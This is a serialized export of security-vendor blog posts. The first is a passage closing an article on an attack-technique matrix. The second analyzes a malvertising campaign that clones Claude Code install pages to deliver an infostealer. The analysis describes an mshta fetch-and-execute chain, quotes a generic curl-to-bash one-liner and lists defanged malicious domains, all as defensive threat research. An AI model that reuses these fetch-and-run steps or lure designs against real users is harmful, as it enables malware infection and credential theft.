bounty.",{"data":1829,"content":1830,"nodeType":237},{},[1831],{"data":1832,"marks":1833,"value":1834,"nodeType":241},{},[],"In comparison, a one-year phishing kit rental costs $1,000. A bulk stolen credential list costs $15. An initial-access-broker-provided IdP admin account costs $3,000. When it costs orders of magnitude less to exploit the person using the browser than to exploit the browser itself, attackers will take the cheaper option every time.",{"data":1836,"content":1837,"nodeType":237},{},[1838],{"data":1839,"marks":1840,"value":1841,"nodeType":241},{},[],"It's worth heading off the obvious counterargument: won't AI-assisted vulnerability discovery eventually make browser exploits cheaper? Perhaps — but it will simultaneously make them easier for browser vendors to find and patch, and vendors like Google and Microsoft have the engineering capacity and financial incentive to scale AI-driven remediation far faster than attackers can scale exploit development.",{"data":1843,"content":1844,"nodeType":320},{},[],{"data":1846,"content":1847,"nodeType":324},{},[1848],{"data":1849,"marks":1850,"value":1852,"nodeType":241},{},[1851],{"type":313},"What hasn't changed",{"data":1854,"content":1855,"nodeType":237},{},[1856,1860,1868],{"data":1857,"marks":1858,"value":1859,"nodeType":241},{},[],"The matrix remains open-source, community-maintained, and available on",{"data":1861,"content":1863,"nodeType":260},{"uri":1862},"https://github.com/pushsecurity/saas-attacks",[1864],{"data":1865,"marks":1866,"value":1867,"nodeType":241},{},[]," GitHub",{"data":1869,"marks":1870,"value":1871,"nodeType":241},{},[],". The goal is the same as it was in 2023: to give offensive and defensive security teams a shared reference point for the techniques that matter most.",{"data":1873,"content":1874,"nodeType":237},{},[1875],{"data":1876,"marks":1877,"value":1878,"nodeType":241},{},[],"We built it because there was a gap in how the industry talked about these techniques, and that gap still exists — MITRE ATT&CK remains essential for endpoint and network TTPs, but the browser-based, identity-first techniques behind most modern breaches are still underrepresented in traditional frameworks.",{"data":1880,"content":1881,"nodeType":237},{},[1882],{"data":1883,"marks":1884,"value":1885,"nodeType":241},{},[],"We continue to maintain the matrix with input from red teams, detection engineers, and threat researchers across the community. Some of the most valuable additions over the past two years have come from practitioners who encountered a technique on an engagement or in an investigation and contributed it back to the repository.",{"data":1887,"content":1888,"nodeType":237},{},[1889,1893,1901],{"data":1890,"marks":1891,"value":1892,"nodeType":241},{},[],"If you're an offensive security professional using these techniques on engagements, or a defender building detections against them, we want to hear from you. Submit a PR, open a discussion, or flag a technique we've missed on ",{"data":1894,"content":1896,"nodeType":260},{"uri":1895},"https://github.com/pushsecurity/browser-identity-attacks-matrix",[1897],{"data":1898,"marks":1899,"value":1900,"nodeType":241},{},[],"GitHub",{"data":1902,"marks":1903,"value":442,"nodeType":241},{},[],{"data":1905,"content":1906,"nodeType":320},{},[],{"data":1908,"content":1909,"nodeType":324},{},[1910],{"data":1911,"marks":1912,"value":1914,"nodeType":241},{},[1913],{"type":313},"Looking ahead",{"data":1916,"content":1917,"nodeType":237},{},[1918],{"data":1919,"marks":1920,"value":1921,"nodeType":241},{},[],"The pace of attacker innovation in browser-based initial access techniques over the past 18 months has been unlike anything we've tracked before — technique after technique moving from research curiosity to industrialized criminal tooling within months, not years.",{"data":1923,"content":1924,"nodeType":1752},{},[1925,1935,1945],{"data":1926,"content":1927,"nodeType":1687},{},[1928],{"data":1929,"content":1930,"nodeType":237},{},[1931],{"data":1932,"marks":1933,"value":1934,"nodeType":241},{},[],"AiTM platforms are adding authorization-based attack options alongside their credential-harvesting capabilities.",{"data":1936,"content":1937,"nodeType":1687},{},[1938],{"data":1939,"content":1940,"nodeType":237},{},[1941],{"data":1942,"marks":1943,"value":1944,"nodeType":241},{},[],"ClickFix has spawned fully browser-native variants.",{"data":1946,"content":1947,"nodeType":1687},{},[1948],{"data":1949,"content":1950,"nodeType":237},{},[1951],{"data":1952,"marks":1953,"value":1954,"nodeType":241},{},[],"AI is lowering the cost of producing convincing social engineering and phishing infrastructure at scale.",{"data":1956,"content":1957,"nodeType":237},{},[1958],{"data":1959,"marks":1960,"value":1961,"nodeType":241},{},[],"We don't see any of this slowing down, and that's exactly why thinking about these attacks as a browser problem instead of siloing them across email, endpoint, network, and cloud categories, each with a partial view of the picture (and still missing the whole when combined).",{"data":1963,"content":1964,"nodeType":237},{},[1965,1969,1976],{"data":1966,"marks":1967,"value":1968,"nodeType":241},{},[],"The Browser & Identity Attacks Matrix is our contribution to keeping that shared understanding current. You can",{"data":1970,"content":1971,"nodeType":260},{"uri":61},[1972],{"data":1973,"marks":1974,"value":1975,"nodeType":241},{},[]," explore the matrix here",{"data":1977,"marks":1978,"value":442,"nodeType":241},{},[],{"data":1980,"content":1981,"nodeType":237},{},[1982,1986,1994],{"data":1983,"marks":1984,"value":1985,"nodeType":241},{},[],"You can also read our recent",{"data":1987,"content":1989,"nodeType":260},{"uri":1988},"https://pushsecurity.com/thank-you/browser-attacks-report",[1990],{"data":1991,"marks":1992,"value":1993,"nodeType":241},{},[]," browser attack techniques report",{"data":1995,"marks":1996,"value":1997,"nodeType":241},{},[]," for more information.",{"data":1999,"content":2003,"nodeType":292},{"target":2000},{"sys":2001},{"id":2002,"type":297,"linkType":298},"1hx6sxpyEzxn4F4jc1RGQi",[],{"data":2005,"content":2006,"nodeType":320},{},[],{"data":2008,"content":2009,"nodeType":237},{},[2010],{"data":2011,"marks":2012,"value":2013,"nodeType":241},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required. Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",{"data":2015,"content":2016,"nodeType":237},{},[2017,2021,2029],{"data":2018,"marks":2019,"value":2020,"nodeType":241},{},[],"Book a",{"data":2022,"content":2024,"nodeType":260},{"uri":2023},"https://pushsecurity.com/demo",[2025],{"data":2026,"marks":2027,"value":2028,"nodeType":241},{},[]," live demo",{"data":2030,"marks":2031,"value":2032,"nodeType":241},{},[]," to learn more.","Introducing the Browser & Identity Attacks Matrix","We're re-releasing the SaaS attack matrix as the Browser & Identity Attacks Matrix. Here's why we've decided to make the change and what it means.","introducing-the-browser-and-identity-attacks-matrix",{"items":2037},[2038,2042],{"sys":2039,"name":2041},{"id":2040},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":2043,"name":2045},{"id":2044},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":2047},[2048],{"fullName":2049,"firstName":2050,"jobTitle":2051,"profilePicture":2052},"Dan Green","Dan","Threat Research",{"url":2053},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1180,"sys":2055,"publishedDate":2057,"content":2058,"title":3065,"synopsis":3066,"hashTags":62,"slug":3067,"tagsCollection":3068,"authorsCollection":3074},{"id":2056},"7bG71Eo43crbIHKzczooVS","2026-03-06T00:00:00.000Z",{"json":2059},{"nodeType":233,"data":2060,"content":2061},{},[2062,2068,2075,2082,2090,2106,2112,2115,2123,2130,2137,2144,2151,2158,2165,2172,2179,2185,2191,2198,2204,2211,2218,2224,2230,2236,2242,2261,2273,2280,2286,2293,2300,2333,2340,2348,2355,2361,2368,2374,2381,2399,2406,2409,2417,2424,2519,2526,2532,2535,2543,2550,2557,2564,2608,2611,2619,2635,2642,2650,2860,2868,2901,2909,2918,2924,2932,2939,2947,2958,2966,2972,2980,2991,2999,3007,3015,3023,3031,3039,3050,3057],{"nodeType":292,"data":2063,"content":2067},{"target":2064},{"sys":2065},{"id":2066,"type":297,"linkType":298},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":237,"data":2069,"content":2070},{},[2071],{"nodeType":241,"value":2072,"marks":2073,"data":2074},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":237,"data":2076,"content":2077},{},[2078],{"nodeType":241,"value":2079,"marks":2080,"data":2081},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":237,"data":2083,"content":2084},{},[2085],{"nodeType":241,"value":2086,"marks":2087,"data":2089},"It’s not hard to see how attackers can exploit this. ",[2088],{"type":313},{},{"nodeType":237,"data":2091,"content":2092},{},[2093,2097,2102],{"nodeType":241,"value":2094,"marks":2095,"data":2096},"We're tracking a technique we're calling ",[],{},{"nodeType":241,"value":2098,"marks":2099,"data":2101},"InstallFix",[2100],{"type":313},{},{"nodeType":241,"value":2103,"marks":2104,"data":2105},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":292,"data":2107,"content":2111},{"target":2108},{"sys":2109},{"id":2110,"type":297,"linkType":298},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":320,"data":2113,"content":2114},{},[],{"nodeType":324,"data":2116,"content":2117},{},[2118],{"nodeType":241,"value":2119,"marks":2120,"data":2122},"InstallFix Claude Code campaign teardown",[2121],{"type":313},{},{"nodeType":237,"data":2124,"content":2125},{},[2126],{"nodeType":241,"value":2127,"marks":2128,"data":2129},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":237,"data":2131,"content":2132},{},[2133],{"nodeType":241,"value":2134,"marks":2135,"data":2136},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":605,"data":2138,"content":2139},{},[2140],{"nodeType":241,"value":2141,"marks":2142,"data":2143},"A new campaign targeting Claude Code",[],{},{"nodeType":237,"data":2145,"content":2146},{},[2147],{"nodeType":241,"value":2148,"marks":2149,"data":2150},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":237,"data":2152,"content":2153},{},[2154],{"nodeType":241,"value":2155,"marks":2156,"data":2157},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":237,"data":2159,"content":2160},{},[2161],{"nodeType":241,"value":2162,"marks":2163,"data":2164},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. ",[],{},{"nodeType":237,"data":2166,"content":2167},{},[2168],{"nodeType":241,"value":2169,"marks":2170,"data":2171},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":237,"data":2173,"content":2174},{},[2175],{"nodeType":241,"value":2176,"marks":2177,"data":2178},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":292,"data":2180,"content":2184},{"target":2181},{"sys":2182},{"id":2183,"type":297,"linkType":298},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":292,"data":2186,"content":2190},{"target":2187},{"sys":2188},{"id":2189,"type":297,"linkType":298},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":237,"data":2192,"content":2193},{},[2194],{"nodeType":241,"value":2195,"marks":2196,"data":2197},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. ",[],{},{"nodeType":292,"data":2199,"content":2203},{"target":2200},{"sys":2201},{"id":2202,"type":297,"linkType":298},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":605,"data":2205,"content":2206},{},[2207],{"nodeType":241,"value":2208,"marks":2209,"data":2210},"Distribution via Google Ads",[],{},{"nodeType":237,"data":2212,"content":2213},{},[2214],{"nodeType":241,"value":2215,"marks":2216,"data":2217},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":292,"data":2219,"content":2223},{"target":2220},{"sys":2221},{"id":2222,"type":297,"linkType":298},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":292,"data":2225,"content":2229},{"target":2226},{"sys":2227},{"id":2228,"type":297,"linkType":298},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":292,"data":2231,"content":2235},{"target":2232},{"sys":2233},{"id":2234,"type":297,"linkType":298},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":292,"data":2237,"content":2241},{"target":2238},{"sys":2239},{"id":2240,"type":297,"linkType":298},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":237,"data":2243,"content":2244},{},[2245,2249,2257],{"nodeType":241,"value":2246,"marks":2247,"data":2248},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. This is one of the reasons that attackers are ",[],{},{"nodeType":260,"data":2250,"content":2251},{"uri":1161},[2252],{"nodeType":241,"value":2253,"marks":2254,"data":2256},"doubling down on targeting ad manager accounts",[2255],{"type":573},{},{"nodeType":241,"value":2258,"marks":2259,"data":2260}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":237,"data":2262,"content":2263},{},[2264,2269],{"nodeType":241,"value":2265,"marks":2266,"data":2268},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[2267],{"type":313},{},{"nodeType":241,"value":2270,"marks":2271,"data":2272},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":237,"data":2274,"content":2275},{},[2276],{"nodeType":241,"value":2277,"marks":2278,"data":2279},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":292,"data":2281,"content":2285},{"target":2282},{"sys":2283},{"id":2284,"type":297,"linkType":298},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":605,"data":2287,"content":2288},{},[2289],{"nodeType":241,"value":2290,"marks":2291,"data":2292},"The payload",[],{},{"nodeType":237,"data":2294,"content":2295},{},[2296],{"nodeType":241,"value":2297,"marks":2298,"data":2299},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":1752,"data":2301,"content":2302},{},[2303,2313,2323],{"nodeType":1687,"data":2304,"content":2305},{},[2306],{"nodeType":237,"data":2307,"content":2308},{},[2309],{"nodeType":241,"value":2310,"marks":2311,"data":2312},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1687,"data":2314,"content":2315},{},[2316],{"nodeType":237,"data":2317,"content":2318},{},[2319],{"nodeType":241,"value":2320,"marks":2321,"data":2322},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1687,"data":2324,"content":2325},{},[2326],{"nodeType":237,"data":2327,"content":2328},{},[2329],{"nodeType":241,"value":2330,"marks":2331,"data":2332},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":237,"data":2334,"content":2335},{},[2336],{"nodeType":241,"value":2337,"marks":2338,"data":2339},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":237,"data":2341,"content":2342},{},[2343],{"nodeType":241,"value":2344,"marks":2345,"data":2347},"You can see the full list of IoCs at the end of the blog.   ",[2346],{"type":313},{},{"nodeType":237,"data":2349,"content":2350},{},[2351],{"nodeType":241,"value":2352,"marks":2353,"data":2354},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",[],{},{"nodeType":292,"data":2356,"content":2360},{"target":2357},{"sys":2358},{"id":2359,"type":297,"linkType":298},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":237,"data":2362,"content":2363},{},[2364],{"nodeType":241,"value":2365,"marks":2366,"data":2367},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":292,"data":2369,"content":2373},{"target":2370},{"sys":2371},{"id":2372,"type":297,"linkType":298},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":605,"data":2375,"content":2376},{},[2377],{"nodeType":241,"value":2378,"marks":2379,"data":2380},"Abusing legitimate hosting services",[],{},{"nodeType":237,"data":2382,"content":2383},{},[2384,2388,2395],{"nodeType":241,"value":2385,"marks":2386,"data":2387},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":260,"data":2389,"content":2390},{"uri":770},[2391],{"nodeType":241,"value":773,"marks":2392,"data":2394},[2393],{"type":573},{},{"nodeType":241,"value":2396,"marks":2397,"data":2398},". ",[],{},{"nodeType":237,"data":2400,"content":2401},{},[2402],{"nodeType":241,"value":2403,"marks":2404,"data":2405},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",[],{},{"nodeType":320,"data":2407,"content":2408},{},[],{"nodeType":324,"data":2410,"content":2411},{},[2412],{"nodeType":241,"value":2413,"marks":2414,"data":2416},"A broader trend",[2415],{"type":313},{},{"nodeType":237,"data":2418,"content":2419},{},[2420],{"nodeType":241,"value":2421,"marks":2422,"data":2423},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1752,"data":2425,"content":2426},{},[2427,2450,2473,2496],{"nodeType":1687,"data":2428,"content":2429},{},[2430],{"nodeType":237,"data":2431,"content":2432},{},[2433,2436,2446],{"nodeType":241,"value":29,"marks":2434,"data":2435},[],{},{"nodeType":260,"data":2437,"content":2439},{"uri":2438},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[2440],{"nodeType":241,"value":2441,"marks":2442,"data":2445},"Fake Claude artifacts used in traditional ClickFix lures",[2443,2444],{"type":573},{"type":313},{},{"nodeType":241,"value":2447,"marks":2448,"data":2449},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1687,"data":2451,"content":2452},{},[2453],{"nodeType":237,"data":2454,"content":2455},{},[2456,2459,2469],{"nodeType":241,"value":29,"marks":2457,"data":2458},[],{},{"nodeType":260,"data":2460,"content":2462},{"uri":2461},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[2463],{"nodeType":241,"value":2464,"marks":2465,"data":2468},"Fake Homebrew installation pages",[2466,2467],{"type":573},{"type":313},{},{"nodeType":241,"value":2470,"marks":2471,"data":2472},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1687,"data":2474,"content":2475},{},[2476],{"nodeType":237,"data":2477,"content":2478},{},[2479,2482,2492],{"nodeType":241,"value":29,"marks":2480,"data":2481},[],{},{"nodeType":260,"data":2483,"content":2485},{"uri":2484},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[2486],{"nodeType":241,"value":2487,"marks":2488,"data":2491},"Fake OpenClaw installers on GitHub",[2489,2490],{"type":573},{"type":313},{},{"nodeType":241,"value":2493,"marks":2494,"data":2495},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1687,"data":2497,"content":2498},{},[2499],{"nodeType":237,"data":2500,"content":2501},{},[2502,2505,2515],{"nodeType":241,"value":29,"marks":2503,"data":2504},[],{},{"nodeType":260,"data":2506,"content":2508},{"uri":2507},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[2509],{"nodeType":241,"value":2510,"marks":2511,"data":2514},"Trojanised npm packages",[2512,2513],{"type":573},{"type":313},{},{"nodeType":241,"value":2516,"marks":2517,"data":2518},": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":237,"data":2520,"content":2521},{},[2522],{"nodeType":241,"value":2523,"marks":2524,"data":2525},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":292,"data":2527,"content":2531},{"target":2528},{"sys":2529},{"id":2530,"type":297,"linkType":298},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":320,"data":2533,"content":2534},{},[],{"nodeType":605,"data":2536,"content":2537},{},[2538],{"nodeType":241,"value":2539,"marks":2540,"data":2542},"How Push detects InstallFix",[2541],{"type":313},{},{"nodeType":237,"data":2544,"content":2545},{},[2546],{"nodeType":241,"value":2547,"marks":2548,"data":2549},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":237,"data":2551,"content":2552},{},[2553],{"nodeType":241,"value":2554,"marks":2555,"data":2556},"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":237,"data":2558,"content":2559},{},[2560],{"nodeType":241,"value":2561,"marks":2562,"data":2563},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":237,"data":2565,"content":2566},{},[2567,2571,2580,2584,2593,2597,2605],{"nodeType":241,"value":2568,"marks":2569,"data":2570},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":260,"data":2572,"content":2574},{"uri":2573},"https://pushsecurity.com/resources/product-brochure",[2575],{"nodeType":241,"value":2576,"marks":2577,"data":2579},"check out our latest product overview",[2578],{"type":573},{},{"nodeType":241,"value":2581,"marks":2582,"data":2583},", ",[],{},{"nodeType":260,"data":2585,"content":2587},{"uri":2586},"https://pushsecurity.com/product-demo/",[2588],{"nodeType":241,"value":2589,"marks":2590,"data":2592},"visit our demo library",[2591],{"type":573},{},{"nodeType":241,"value":2594,"marks":2595,"data":2596},", or ",[],{},{"nodeType":260,"data":2598,"content":2599},{"uri":2023},[2600],{"nodeType":241,"value":2601,"marks":2602,"data":2604},"book some time with one of our team for a live demo",[2603],{"type":573},{},{"nodeType":241,"value":442,"marks":2606,"data":2607},[],{},{"nodeType":320,"data":2609,"content":2610},{},[],{"nodeType":324,"data":2612,"content":2613},{},[2614],{"nodeType":241,"value":2615,"marks":2616,"data":2618},"IoCs",[2617],{"type":313},{},{"nodeType":237,"data":2620,"content":2621},{},[2622,2625,2632],{"nodeType":241,"value":894,"marks":2623,"data":2624},[],{},{"nodeType":260,"data":2626,"content":2627},{"uri":899},[2628],{"nodeType":241,"value":902,"marks":2629,"data":2631},[2630],{"type":573},{},{"nodeType":241,"value":906,"marks":2633,"data":2634},[],{},{"nodeType":237,"data":2636,"content":2637},{},[2638],{"nodeType":241,"value":2639,"marks":2640,"data":2641},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":237,"data":2643,"content":2644},{},[2645],{"nodeType":241,"value":2646,"marks":2647,"data":2649},"Cloned domains:",[2648],{"type":313},{},{"nodeType":1752,"data":2651,"content":2652},{},[2653,2663,2673,2683,2693,2703,2712,2722,2732,2741,2751,2761,2771,2781,2791,2801,2811,2820,2830,2840,2850],{"nodeType":1687,"data":2654,"content":2655},{},[2656],{"nodeType":237,"data":2657,"content":2658},{},[2659],{"nodeType":241,"value":2660,"marks":2661,"data":2662},"claud-code[.]pages[.]dev",[],{},{"nodeType":1687,"data":2664,"content":2665},{},[2666],{"nodeType":237,"data":2667,"content":2668},{},[2669],{"nodeType":241,"value":2670,"marks":2671,"data":2672},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2674,"content":2675},{},[2676],{"nodeType":237,"data":2677,"content":2678},{},[2679],{"nodeType":241,"value":2680,"marks":2681,"data":2682},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2684,"content":2685},{},[2686],{"nodeType":237,"data":2687,"content":2688},{},[2689],{"nodeType":241,"value":2690,"marks":2691,"data":2692},"hgjbulk.pages[.]dev",[],{},{"nodeType":1687,"data":2694,"content":2695},{},[2696],{"nodeType":237,"data":2697,"content":2698},{},[2699],{"nodeType":241,"value":2700,"marks":2701,"data":2702},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1687,"data":2704,"content":2705},{},[2706],{"nodeType":237,"data":2707,"content":2708},{},[2709],{"nodeType":241,"value":2690,"marks":2710,"data":2711},[],{},{"nodeType":1687,"data":2713,"content":2714},{},[2715],{"nodeType":237,"data":2716,"content":2717},{},[2718],{"nodeType":241,"value":2719,"marks":2720,"data":2721},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2723,"content":2724},{},[2725],{"nodeType":237,"data":2726,"content":2727},{},[2728],{"nodeType":241,"value":2729,"marks":2730,"data":2731},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1687,"data":2733,"content":2734},{},[2735],{"nodeType":237,"data":2736,"content":2737},{},[2738],{"nodeType":241,"value":2670,"marks":2739,"data":2740},[],{},{"nodeType":1687,"data":2742,"content":2743},{},[2744],{"nodeType":237,"data":2745,"content":2746},{},[2747],{"nodeType":241,"value":2748,"marks":2749,"data":2750},"cladueall[.]pages[.]dev",[],{},{"nodeType":1687,"data":2752,"content":2753},{},[2754],{"nodeType":237,"data":2755,"content":2756},{},[2757],{"nodeType":241,"value":2758,"marks":2759,"data":2760},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1687,"data":2762,"content":2763},{},[2764],{"nodeType":237,"data":2765,"content":2766},{},[2767],{"nodeType":241,"value":2768,"marks":2769,"data":2770},"myclauda[.]it[.]com",[],{},{"nodeType":1687,"data":2772,"content":2773},{},[2774],{"nodeType":237,"data":2775,"content":2776},{},[2777],{"nodeType":241,"value":2778,"marks":2779,"data":2780},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1687,"data":2782,"content":2783},{},[2784],{"nodeType":237,"data":2785,"content":2786},{},[2787],{"nodeType":241,"value":2788,"marks":2789,"data":2790},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1687,"data":2792,"content":2793},{},[2794],{"nodeType":237,"data":2795,"content":2796},{},[2797],{"nodeType":241,"value":2798,"marks":2799,"data":2800},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1687,"data":2802,"content":2803},{},[2804],{"nodeType":237,"data":2805,"content":2806},{},[2807],{"nodeType":241,"value":2808,"marks":2809,"data":2810},"claude-code-macos[.]com",[],{},{"nodeType":1687,"data":2812,"content":2813},{},[2814],{"nodeType":237,"data":2815,"content":2816},{},[2817],{"nodeType":241,"value":2729,"marks":2818,"data":2819},[],{},{"nodeType":1687,"data":2821,"content":2822},{},[2823],{"nodeType":237,"data":2824,"content":2825},{},[2826],{"nodeType":241,"value":2827,"marks":2828,"data":2829},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2831,"content":2832},{},[2833],{"nodeType":237,"data":2834,"content":2835},{},[2836],{"nodeType":241,"value":2837,"marks":2838,"data":2839},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2841,"content":2842},{},[2843],{"nodeType":237,"data":2844,"content":2845},{},[2846],{"nodeType":241,"value":2847,"marks":2848,"data":2849},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1687,"data":2851,"content":2852},{},[2853],{"nodeType":237,"data":2854,"content":2855},{},[2856],{"nodeType":241,"value":2857,"marks":2858,"data":2859},"notklmalans[.]pages[.]dev",[],{},{"nodeType":237,"data":2861,"content":2862},{},[2863],{"nodeType":241,"value":2864,"marks":2865,"data":2867},"Domains hosting malicious 